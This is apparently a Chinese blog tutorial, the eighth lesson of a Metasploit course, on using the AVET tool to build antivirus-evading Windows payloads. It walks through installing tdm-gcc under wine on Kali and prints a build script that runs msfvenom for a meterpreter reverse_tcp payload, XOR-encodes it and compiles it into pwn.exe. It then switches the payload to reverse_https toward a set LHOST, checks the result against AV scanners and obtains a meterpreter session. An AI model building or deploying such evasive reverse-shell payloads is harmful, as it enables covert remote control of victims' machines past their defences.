enter description here

0x00

Metasploit系列课程第八课 最后的最后一课。这次和以往不同,最后一课不打算用视频,想用文章的形式给各位体现,说实在的个人的时间实在不太充裕,也是最近抽空给各位写下这篇文章。。。
 
Metasploit 系列教程 => 链接:https://pan.baidu.com/s/1dFzPkJZ 密码:evwg
周年庆版 V1.6 github =>https://github.com/demonsec666/secist_script

0x01

Metasploit系列课程第八课这次使用到的工具呢是(AVET)

1.下载地址 : https://github.com/govolution/avet (其中的几篇pdf 文章不错)
 
enter description here
 
2.在kali中使用这款工具呢。作者提示我们需要安装一样编译器是(tdm-gcc)(作者提供我的,不知道为什么装不上,所以我从官网上下载了,各位也可以使用我提供的)
http://tdm-gcc.tdragon.net/download 链接:https://pan.baidu.com/s/1dFzPkJZ 密码:evwg
 
enter description here
 
3.我们下载完后,将开始使用wine 在kali上安装tdm-gcc(在kali中会有中文乱码,可以跟着我图中步骤走,左图为我mac ,右图为kali 使用wine的情况,因时间关系我未去解决编码的问题,先凑合着看)
 
enter description here
 
enter description here
 
enter description here
 
enter description here
 
enter description here
 
enter description here
 
enter description here
 
正在安装
enter description here
 
安装完毕
enter description here
 
enter description here
 
 

0x02

  1. 我们看下大致的目录情况
     
    enter description here
     
    enter description here
     
    2.使用方法根据作者提示给我们的是这样的
     
    enter description here
     
    root@kalidan:~/tools/avet# ./build/build_win32_meterpreter_rev_https_20xshikata.sh
    那么我们可以看到他这边调用的是build的目录下的 build_win32_meterpreter_rev_https_20xshikata.sh,使用shell脚本
    我们大致的看下这个脚本的代码:

#build_win64_meterpreter_rev_tcp_xor
环境变量定义
. avet/build/global_win64.sh

make meterpreter reverse payload

#制作msf reverse payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxxxx lport=xxx -e x64/xor -f c –platform Windows > avet/sc.txt
#make_avet 格式化 这个 shellcode
./avet/format.sh avet/sc.txt > avet/scclean.txt && rm avet/sc.txt
#调用 make_avet, compile
./avet/make_avet -f avet/scclean.txt -X -E
$win64_compiler -o output/pwn.exe avet.c
输出pwn.exe

cleanup

rm avet/scclean.txt && echo “” > avet/defs.h

 
enter description here
 
3. 使用制作payload执行的过程

 
enter description here
 
enter description here
 
4.其中只要我们修改的代码呢其实就是msfvenom那段代码 将LHOST 和LPORT 改成自己想要的就可以了

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.128 lport=443 -e x86

那么我们重新生成一次,并手动的开启MSF 。
 
enter description here
 
在运行之前我们可以对pwn.exe检测一次是否能绕过AV
 
enter description here
 
效果还算是理想
 
enter description here
 
运行 制作成的pwn.exe后 得到meterpreter.
enter description here
 
enter description here
 
那么shell脚本下 可以这么写
enter description here
 
项目已经上传在GitHub项目中了
最后的彩蛋 我使用ruby 做的GUI=> GTK

视频演示: